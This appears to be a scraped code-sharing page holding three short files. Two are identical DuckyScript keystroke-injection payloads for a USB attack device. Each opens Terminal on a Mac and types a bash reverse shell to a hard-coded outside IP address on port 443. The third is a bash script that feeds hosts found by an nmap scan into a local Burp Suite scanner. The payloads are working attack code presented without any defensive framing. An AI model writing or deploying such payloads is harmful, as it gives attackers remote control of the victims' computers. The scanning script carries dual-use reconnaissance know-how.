This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DELAY 2000 | |
| GUI SPACE | |
| DELAY 500 | |
| STRING Terminal | |
| DELAY 500 | |
| ENTER | |
| DELAY 500 | |
| STRING bash -i >& /dev/tcp/192.241.157.75/443 0>&1 & | |
| DELAY 500 | |
| ENTER |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| DELAY 2000 | |
| GUI SPACE | |
| DELAY 500 | |
| STRING Terminal | |
| DELAY 500 | |
| ENTER | |
| DELAY 500 | |
| STRING bash -i >& /dev/tcp/192.241.157.75/443 0>&1 & | |
| DELAY 500 | |
| ENTER |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Script to Scan All Sites Found With A Simple NMAP Scan With Burp. | |
| sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}') | |
| for site in $sites | |
| do | |
| curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1 | |
| printf "Scanning %s with burp.\\n" "$site" | |
| done |